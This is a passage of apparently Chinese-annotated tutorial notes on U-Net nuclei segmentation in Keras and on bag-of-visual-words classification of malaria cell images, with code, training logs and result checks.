    c5 = tf.keras.layers.Dropout(0.3)(c5)
    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

    # Expansive path 延展路径
    u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
    u6 = tf.keras.layers.concatenate([u6, c4])
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
    c6 = tf.keras.layers.Dropout(0.2)(c6)
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

    u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
    u7 = tf.keras.layers.concatenate([u7, c3])
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
    c7 = tf.keras.layers.Dropout(0.2)(c7)
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

    u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
    u8 = tf.keras.layers.concatenate([u8, c2])
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
    c8 = tf.keras.layers.Dropout(0.1)(c8)
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

    u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
    u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
    c9 = tf.keras.layers.Dropout(0.1)(c9)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

    outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
    model.summary()
    Model: "model"__________________________________________________________________________________________________ Layer (type)                   Output Shape         Param #     Connected to                     ================================================================================================== input_2 (InputLayer)           [(None, 128, 128, 3  0           []                                                               )]                                                                                                                                                                   lambda (Lambda)                (None, 128, 128, 3)  0           ['input_2[0][0]']                                                                                                                   conv2d (Conv2D)                (None, 128, 128, 16  448         ['lambda[0][0]']                                                 )                                                                                                                                                                    dropout (Dropout)              (None, 128, 128, 16  0           ['conv2d[0][0]']                                                 )                                                                                                                                                                    conv2d_1 (Conv2D)              (None, 128, 128, 16  2320        ['dropout[0][0]']                                                )                                                                                                                                                                    max_pooling2d (MaxPooling2D)   (None, 64, 64, 16)   0           ['conv2d_1[0][0]']                                                                                                                  conv2d_2 (Conv2D)              (None, 64, 64, 32)   4640        ['max_pooling2d[0][0]']                                                                                                             dropout_1 (Dropout)            (None, 64, 64, 32)   0           ['conv2d_2[0][0]']                                                                                                                  conv2d_3 (Conv2D)              (None, 64, 64, 32)   9248        ['dropout_1[0][0]']                                                                                                                 max_pooling2d_1 (MaxPooling2D)  (None, 32, 32, 32)  0           ['conv2d_3[0][0]']                                                                                                                  conv2d_4 (Conv2D)              (None, 32, 32, 64)   18496       ['max_pooling2d_1[0][0]']                                                                                                           dropout_2 (Dropout)            (None, 32, 32, 64)   0           ['conv2d_4[0][0]']                                                                                                                  conv2d_5 (Conv2D)              (None, 32, 32, 64)   36928       ['dropout_2[0][0]']                                                                                                                 max_pooling2d_2 (MaxPooling2D)  (None, 16, 16, 64)  0           ['conv2d_5[0][0]']                                                                                                                  conv2d_6 (Conv2D)              (None, 16, 16, 128)  73856       ['max_pooling2d_2[0][0]']                                                                                                           dropout_3 (Dropout)            (None, 16, 16, 128)  0           ['conv2d_6[0][0]']                                                                                                                  conv2d_7 (Conv2D)              (None, 16, 16, 128)  147584      ['dropout_3[0][0]']                                                                                                                 max_pooling2d_3 (MaxPooling2D)  (None, 8, 8, 128)   0           ['conv2d_7[0][0]']                                                                                                                  conv2d_8 (Conv2D)              (None, 8, 8, 256)    295168      ['max_pooling2d_3[0][0]']                                                                                                           dropout_4 (Dropout)            (None, 8, 8, 256)    0           ['conv2d_8[0][0]']                                                                                                                  conv2d_9 (Conv2D)              (None, 8, 8, 256)    590080      ['dropout_4[0][0]']                                                                                                                 conv2d_transpose (Conv2DTransp  (None, 16, 16, 128)  131200     ['conv2d_9[0][0]']                ose)                                                                                                                                                                                                concatenate (Concatenate)      (None, 16, 16, 256)  0           ['conv2d_transpose[0][0]',                                                                         'conv2d_7[0][0]']                                                                                                                  conv2d_10 (Conv2D)             (None, 16, 16, 128)  295040      ['concatenate[0][0]']                                                                                                               dropout_5 (Dropout)            (None, 16, 16, 128)  0           ['conv2d_10[0][0]']                                                                                                                 conv2d_11 (Conv2D)             (None, 16, 16, 128)  147584      ['dropout_5[0][0]']                                                                                                                 conv2d_transpose_1 (Conv2DTran  (None, 32, 32, 64)  32832       ['conv2d_11[0][0]']               spose)                                                                                                                                                                                              concatenate_1 (Concatenate)    (None, 32, 32, 128)  0           ['conv2d_transpose_1[0][0]',                                                                       'conv2d_5[0][0]']                                                                                                                  conv2d_12 (Conv2D)             (None, 32, 32, 64)   73792       ['concatenate_1[0][0]']                                                                                                             dropout_6 (Dropout)            (None, 32, 32, 64)   0           ['conv2d_12[0][0]']                                                                                                                 conv2d_13 (Conv2D)             (None, 32, 32, 64)   36928       ['dropout_6[0][0]']                                                                                                                 conv2d_transpose_2 (Conv2DTran  (None, 64, 64, 32)  8224        ['conv2d_13[0][0]']               spose)                                                                                                                                                                                              concatenate_2 (Concatenate)    (None, 64, 64, 64)   0           ['conv2d_transpose_2[0][0]',                                                                       'conv2d_3[0][0]']                                                                                                                  conv2d_14 (Conv2D)             (None, 64, 64, 32)   18464       ['concatenate_2[0][0]']                                                                                                             dropout_7 (Dropout)            (None, 64, 64, 32)   0           ['conv2d_14[0][0]']                                                                                                                 conv2d_15 (Conv2D)             (None, 64, 64, 32)   9248        ['dropout_7[0][0]']                                                                                                                 conv2d_transpose_3 (Conv2DTran  (None, 128, 128, 16  2064       ['conv2d_15[0][0]']               spose)                         )                                                                                                                                                                    concatenate_3 (Concatenate)    (None, 128, 128, 32  0           ['conv2d_transpose_3[0][0]',                                     )                                 'conv2d_1[0][0]']                                                                                                                  conv2d_16 (Conv2D)             (None, 128, 128, 16  4624        ['concatenate_3[0][0]']                                          )                                                                                                                                                                    dropout_8 (Dropout)            (None, 128, 128, 16  0           ['conv2d_16[0][0]']                                              )                                                                                                                                                                    conv2d_17 (Conv2D)             (None, 128, 128, 16  2320        ['dropout_8[0][0]']                                              )                                                                                                                                                                    conv2d_18 (Conv2D)             (None, 128, 128, 1)  17          ['conv2d_17[0][0]']                                                                                                                ==================================================================================================Total params: 1,941,105Trainable params: 1,941,105Non-trainable params: 0__________________________________________________________________________________________________
    1
    2
    3
    4
    from tensorflow.keras import utils
    from keras.utils.vis_utils import model_to_dot

    utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)

    png

    75 - Image Segmentation using U-Net - Part 3 -What are trainable parameters-

    ​ 介绍了神经网络中参数量是怎么算的。

    76 - Image Segmentation using U-Net - Part 4 -Model fitting- checkpoints- and callbacks-

    Modelcheckpoint

    1
    2
    3
    4
    5
    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
    callbacks = [
    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
    tf.keras.callbacks.TensorBoard(log_dir='logs')
    ]

    77 - Image Segmentation using U-Net - Part 5 -Understanding the data-

    获取数据集:2018 Data Science Bowl | Kaggle

    78 - Image Segmentation using U-Net - Part 6 -Running the code and understanding results-

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    import tensorflow as tf
    import os
    import numpy as np

    IMG_WIDTH = 128
    IMG_HEIGHT = 128
    IMG_CHANNELS = 3

    TRAIN_PATH = 'stage1_train/'
    TEST_PATH = 'stage1_test/'

    train_ids = next(os.walk(TRAIN_PATH))[1]
    test_ids = next(os.walk(TEST_PATH))[1]

    X_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
    Y_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_) # y 是一个二值图像

    Resizing training images and masks

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import random
    from tqdm import tqdm
    from skimage.io import imread, imshow
    from skimage.transform import resize
    import matplotlib.pyplot as plt

    seed = 42
    np.random.seed = seed

    print('Resizing training images and masks')
    for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):
    path = TRAIN_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS] # 读取图像
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True) # 将图像大小修改为 128x128
    X_train[n] = img # Fill empty X_train with values from img
    mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_)
    for mask_file in next(os.walk(path + '/masks/'))[2]:
    mask_ = imread(path + '/masks/' + mask_file)
    mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
    preserve_range=True), axis=-1)
    mask = np.maximum(mask, mask_)

    Y_train[n] = mask # Fill empty Y_train with values from img
    Resizing training images and masks100%|██████████| 670/670 [04:38<00:00,  2.41it/s]

    Resizing test images

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
    sizes_test = []
    print('Resizing test images')
    for n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):
    path = TEST_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
    sizes_test.append([img.shape[0], img.shape[1]])
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
    X_test[n] = img

    print('Done!')
    Resizing test images100%|██████████| 65/65 [00:01<00:00, 50.05it/s]Done!


    1
    2
    3
    image_x = random.randint(0, len(train_ids))
    imshow(X_train[image_x])
    plt.show()

    png

    1
    2
    imshow(np.squeeze(Y_train[image_x]))
    plt.show()

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
    s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

    # Contraction path 收缩路径
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
    c1 = tf.keras.layers.Dropout(0.1)(c1)
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
    p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
    c2 = tf.keras.layers.Dropout(0.1)(c2)
    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
    p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
    c3 = tf.keras.layers.Dropout(0.2)(c3)
    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
    p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
    c4 = tf.keras.layers.Dropout(0.2)(c4)
    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
    p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
    c5 = tf.keras.layers.Dropout(0.3)(c5)
    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

    # Expansive path 延展路径
    u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
    u6 = tf.keras.layers.concatenate([u6, c4])
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
    c6 = tf.keras.layers.Dropout(0.2)(c6)
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

    u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
    u7 = tf.keras.layers.concatenate([u7, c3])
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
    c7 = tf.keras.layers.Dropout(0.2)(c7)
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

    u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
    u8 = tf.keras.layers.concatenate([u8, c2])
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
    c8 = tf.keras.layers.Dropout(0.1)(c8)
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

    u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
    u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
    c9 = tf.keras.layers.Dropout(0.1)(c9)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

    outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

    Modelcheckpoint

    1
    2
    3
    4
    5
    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
    callbacks = [
    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
    tf.keras.callbacks.TensorBoard(log_dir='logs')
    ]
    1
    results = model.fit(X_train, Y_train, validation_split=0.1, batch_size=16, epochs=25, callbacks=callbacks)
    Epoch 1/2538/38 [==============================] - 20s 280ms/step - loss: 0.5785 - accuracy: 0.7459 - val_loss: 0.3360 - val_accuracy: 0.7809Epoch 2/2538/38 [==============================] - 7s 173ms/step - loss: 0.2739 - accuracy: 0.8642 - val_loss: 0.2158 - val_accuracy: 0.9125Epoch 3/2538/38 [==============================] - 7s 174ms/step - loss: 0.1924 - accuracy: 0.9304 - val_loss: 0.1558 - val_accuracy: 0.9406Epoch 4/2538/38 [==============================] - 7s 173ms/step - loss: 0.1589 - accuracy: 0.9422 - val_loss: 0.1474 - val_accuracy: 0.9425Epoch 5/2538/38 [==============================] - 7s 175ms/step - loss: 0.1449 - accuracy: 0.9472 - val_loss: 0.1173 - val_accuracy: 0.9543Epoch 6/2538/38 [==============================] - 7s 176ms/step - loss: 0.1394 - accuracy: 0.9480 - val_loss: 0.1090 - val_accuracy: 0.9565Epoch 7/2538/38 [==============================] - 7s 176ms/step - loss: 0.1246 - accuracy: 0.9540 - val_loss: 0.1084 - val_accuracy: 0.9579Epoch 8/2538/38 [==============================] - 7s 177ms/step - loss: 0.1204 - accuracy: 0.9553 - val_loss: 0.1113 - val_accuracy: 0.9577Epoch 9/2538/38 [==============================] - 7s 177ms/step - loss: 0.1124 - accuracy: 0.9581 - val_loss: 0.0957 - val_accuracy: 0.9611Epoch 10/2538/38 [==============================] - 7s 177ms/step - loss: 0.1087 - accuracy: 0.9591 - val_loss: 0.0930 - val_accuracy: 0.9618Epoch 11/2538/38 [==============================] - 7s 179ms/step - loss: 0.1079 - accuracy: 0.9593 - val_loss: 0.0892 - val_accuracy: 0.9650Epoch 12/2538/38 [==============================] - 7s 179ms/step - loss: 0.1044 - accuracy: 0.9605 - val_loss: 0.0918 - val_accuracy: 0.9643Epoch 13/2538/38 [==============================] - 7s 180ms/step - loss: 0.1021 - accuracy: 0.9608 - val_loss: 0.0888 - val_accuracy: 0.9651Epoch 14/2538/38 [==============================] - 7s 180ms/step - loss: 0.0989 - accuracy: 0.9621 - val_loss: 0.0950 - val_accuracy: 0.9616Epoch 15/2538/38 [==============================] - 7s 180ms/step - loss: 0.1003 - accuracy: 0.9612 - val_loss: 0.0858 - val_accuracy: 0.9661Epoch 16/2538/38 [==============================] - 7s 180ms/step - loss: 0.1005 - accuracy: 0.9613 - val_loss: 0.0872 - val_accuracy: 0.9660Epoch 17/2538/38 [==============================] - 7s 181ms/step - loss: 0.0963 - accuracy: 0.9630 - val_loss: 0.0846 - val_accuracy: 0.9659Epoch 18/2538/38 [==============================] - 7s 184ms/step - loss: 0.0956 - accuracy: 0.9632 - val_loss: 0.0840 - val_accuracy: 0.9665Epoch 19/2538/38 [==============================] - 7s 183ms/step - loss: 0.0925 - accuracy: 0.9642 - val_loss: 0.0819 - val_accuracy: 0.9675Epoch 20/2538/38 [==============================] - 7s 183ms/step - loss: 0.0927 - accuracy: 0.9640 - val_loss: 0.0833 - val_accuracy: 0.9677Epoch 21/2538/38 [==============================] - 7s 183ms/step - loss: 0.0917 - accuracy: 0.9641 - val_loss: 0.0846 - val_accuracy: 0.9660
    1
    2
    3
    4
    5
    6
    7
    8
    9
    idx = random.randint(0, len(X_train))

    preds_train = model.predict(X_train[:int(X_train.shape[0]*0.9)], verbose=1)
    preds_val = model.predict(X_train[int(X_train.shape[0]*0.9):], verbose=1)
    preds_test = model.predict(X_test, verbose=1)

    preds_train_t = (preds_train > 0.5).astype(np.uint8)
    preds_val_t = (preds_val > 0.5).astype(np.uint8)
    preds_test_t = (preds_test > 0.5).astype(np.uint8)
    19/19 [==============================] - 5s 161ms/step3/3 [==============================] - 0s 91ms/step3/3 [==============================] - 1s 417ms/step

    Perform a sanity check on some random training samples

    • 对一些随机训练样本进行合理性检查
    1
    2
    3
    4
    5
    6
    7
    ix = random.randint(0, len(preds_train_t))
    imshow(X_train[ix])
    plt.show()
    imshow(np.squeeze(Y_train[ix]))
    plt.show()
    imshow(np.squeeze(preds_train_t[ix]))
    plt.show()

    png

    png

    C:\Users\gzjzx\anaconda3\lib\site-packages\skimage\io\_plugins\matplotlib_plugin.py:150: UserWarning: Low image data range; displaying image with stretched contrast.  lo, hi, cmap = _get_display_range(image)

    png

    Perform a sanity check on some random validation samples

    • 对一些随机的验证样本进行合理性检查
    1
    2
    3
    4
    5
    6
    7
    ix = random.randint(0, len(preds_val_t))
    imshow(X_train[int(X_train.shape[0]*0.9):][ix])
    plt.show()
    imshow(np.squeeze(Y_train[int(Y_train.shape[0]*0.9):][ix]))
    plt.show()
    imshow(np.squeeze(preds_val_t[ix]))
    plt.show()

    png

    png

    png

    可视化结果

    1
    !tensorboard --logdir=logs/ --host localhost --port 8088

    png

    ]]>
    @@ -8741,7 +8741,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(69)-BOVW/ - 正文

    69 - Image classification using Bag of Visual Words -BOVW-

    Bag-of-words 模型入门

    它用于图像分类,而不是像素分割

    All cell images resized to 128 x 128
    Images used for test are completely different that the ones used for training.
    136 images for testing, each parasitized and uninfected (136 x 2)
    104 images for training, each parasitized and uninfected (104 x 2)
    Cannot import lots of data to Github, so uploaded 10 images of each.
    Download full dataset from: ftp://lhcftp.nlm.nih.gov/Open-Access-Datasets/Malaria/cell_images.zip
    这个链接好像打不开?找了个其他地址:https://www.kaggle.com/datasets/iarunava/cell-images-for-detecting-malaria?resource=download

    Train_BOVW

    import cv2
    import numpy as np
    import os
    • Get the training classes names and store them in a list
    • Here we use folder names for class names
    train_path = 'images/cell_images/train'  # Folder Names are Parasitized and Uninfected
    training_names = os.listdir(train_path)
    • Get path to all images and save them in a list
    • image_paths and the corresponding label(对应标签)in image_paths
    image_paths = []
    image_classes = []
    class_id = 0
    • To make it easy to list all file names in a directory let us define a function
    def imglist(path):    
    return [os.path.join(path, f) for f in os.listdir(path)]
    • Fill the placeholder empty lists with image path, classes, and add class ID number
      • 用 image path,classes 和 class ID number 填充 empty lists
    for training_name in training_names:
    dir = os.path.join(train_path, training_name)
    class_path = imglist(dir)
    image_paths += class_path
    image_classes += [class_id] * len(class_path)
    class_id += 1
    image_paths
    ['images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_87.png', 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_88.png', 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133205a_cell_87.png', 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133205a_cell_88.png', 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133238a_cell_97.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112043_cell_202.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112043_cell_203.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112116_cell_204.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112116_cell_205.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112138_cell_183.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104919_cell_240.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_102.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_11.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_139.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_151.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_20.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_4.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_59.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_72.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_98.png']
    • 总共两类:Parasitized 寄生,Uninfected 未被感染
    image_classes
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
    class_id
    2
    • Create feature extraction and keypoint detector objects
      • 创建特征提取和关键点检测器对象
    • SIFT is not available anymore in openCV
      • SIFT 在 openCV 中不再可用
    • Create List where all the descriptors will be stored
      • 创建一个列表存储所有的描述符
    des_list = []

    OpenCV 尺度不变特征检测:SIFT、SURF、BRISK、ORB

    • BRISK is a good replacement to SIFT. ORB also works but didn’t work well for this example
      • BRISK 是 SIFT 的良好替代品。ORB 也可以工作,但在本例中效果不佳
    brisk = cv2.BRISK_create(30)
    for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    des_list.append((image_path, des))
    • Stack all the descriptors vertically in a numpy array
      • 在 numpy 数组中垂直堆叠所有描述符
    descriptors = des_list[0][1]
    for image_path, descriptor in des_list[1:]:
    descriptors = np.vstack((descriptors, descriptor))
    descriptors
    array([[244, 255, 223, ...,   0,  17,  48],       [254, 191, 247, ...,   8,  25,   0],       [240, 255, 255, ..., 137,  25,   0],       ...,       [128, 255, 255, ...,   0,   0,   0],       [176, 255, 255, ...,   0,   0,   0],       [240, 255, 255, ...,   0,   0,   0]], dtype=uint8)
    • kmeans works only on float, so convert integers to float
    descriptors_float = descriptors.astype(float)
    • Perform k-means clustering and vector quantization
      • 执行 k 均值聚类和矢量量化

    这里使用 k-means,也可以使用 SVM 或 随机森林。

    from scipy.cluster.vq import kmeans, vq

    k = 200 # k means with 100 clusters gives lower accuracy for the aeroplane example
    voc, variance = kmeans(descriptors_float, k, 1)
    • Calculate the histogram of features and represent them as vector
      • 计算特征的直方图并将其表示为向量
    • vq Assigns codes from a code book to observations.
      • vq 将代码簿中的代码分配给观察值
    im_features = np.zeros((len(image_paths), k), "float32")
    for i in range(len(image_paths)):
    words, distance = vq(des_list[i][1],voc)
    for w in words:
    im_features[i][w] += 1
    words
    array([ 48,  14,  24,  50,  86, 177, 199,  91,  24,  15,  21,  44,  86,       192,  71,  46, 193,  59, 154,   2,  80, 119,  43])
    distance
    array([ 79.62537284,  76.25693411, 150.61976132,   0.        ,       189.20699172, 167.46438427,   0.        , 132.3697473 ,        95.40341975, 137.6727198 , 113.90895487, 104.85068749,       104.80526159,   0.        , 170.24394262, 220.20785635,       118.6493433 ,  77.81910113,   0.        , 101.40636075,       217.89599966,  84.18283673, 133.43163043])
    • 执行 Tf-Idf 矢量化
    nbr_occurences = np.sum((im_features > 0) * 1, axis=0)
    idf = np.array(np.log((1.0 * len(image_paths) + 1) / (1.0 * nbr_occurences + 1)), 'float32')
    • Scaling the words standardize features by removing the mean and scaling to unit variance in a way normalization
      • 通过去除均值并以归一化的方式缩放到单位方差来缩放单词标准化特征
    from sklearn.preprocessing import StandardScaler
    stdSlr = StandardScaler().fit(im_features)
    im_features = stdSlr.transform(im_features)
    • Train an algorithm to discriminate vectors corresponding to positive and negative training images
    • Train the Linear SVM
    from sklearn.svm import LinearSVC
    clf = LinearSVC(max_iter=10000) # Default of 100 is not converging
    clf.fit(im_features, np.array(image_classes))
    • Save the SVM
    • Joblib dumps Python object into one file
      • Joblib 将 Python 对象转储到一个文件中
    import joblib
    joblib.dump((clf, training_names, stdSlr, k, voc), "bovw.pkl", compress=3)
    ['bovw.pkl']

    Validate_BOVW

    import cv2
    import numpy as np
    import os
    import pylab as pl
    from sklearn.metrics import confusion_matrix, accuracy_score # sreeni
    import joblib
    • Load the classifier, class names, scaler, number of clusters and vocabulary from stored pickle file (generated during training)
      • 从存储的 pickle 文件中加载分类器、类名、缩放器、聚类数和词汇表(在训练期间生成)
    clf, classes_names, stdSlr, k, voc = joblib.load("bovw.pkl")
    • instead of test if you use train then we get great accuracy
      • 如果你用训练集来代替测试,我们会得到很高的准确性
    test_path = 'images/cell_images/test'
    testing_names = os.listdir(test_path)
    # Get path to all images and save them in a list
    # image_paths and the corresponding label in image_paths
    image_paths = []
    image_classes = []
    class_id = 0

    # To make it easy to list all file names in a directory let us define a function

    def imglist(path):
    return [os.path.join(path, f) for f in os.listdir(path)]

    # Fill the placeholder empty lists with image path, classes, and add class ID number

    for testing_name in testing_names:
    dir = os.path.join(test_path, testing_name)
    class_path = imglist(dir)
    image_paths+=class_path
    image_classes+=[class_id]*len(class_path)
    class_id+=1

    # Create feature extraction and keypoint detector objects
    # SIFT is not available anymore in openCV
    # Create List where all the descriptors will be stored
    des_list = []

    # BRISK is a good replacement to SIFT. ORB also works but didn;t work well for this example
    brisk = cv2.BRISK_create(30)

    for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    des_list.append((image_path, des))

    # Stack all the descriptors vertically in a numpy array
    descriptors = des_list[0][1]
    for image_path, descriptor in des_list[0:]:
    descriptors = np.vstack((descriptors, descriptor))

    # Calculate the histogram of features
    # vq Assigns codes from a code book to observations.
    from scipy.cluster.vq import vq
    test_features = np.zeros((len(image_paths), k), "float32")
    for i in range(len(image_paths)):
    words, distance = vq(des_list[i][1],voc)
    for w in words:
    test_features[i][w] += 1

    # Perform Tf-Idf vectorization
    nbr_occurences = np.sum( (test_features > 0) * 1, axis = 0)
    idf = np.array(np.log((1.0*len(image_paths)+1) / (1.0*nbr_occurences + 1)), 'float32')

    # Scale the features
    # Standardize features by removing the mean and scaling to unit variance
    # Scaler (stdSlr comes from the pickled file we imported)
    test_features = stdSlr.transform(test_features)
    • Until here most of the above code is similar to Train excerpt for kmeans clustering

    • Report true class names so they can be compared with predicted classes
      • 报告真实的类别名称,以便与预测的类别进行比较
    true_class = [classes_names[i] for i in image_classes]
    • Perform the predictions and report predicted class names.
      • 执行预测,并报告预测的类名。
    predictions = [classes_names[i] for i in clf.predict(test_features)]
    • Print the true class and Predictions
    print ("true_class =" + str(true_class))
    print ("prediction =" + str(predictions))
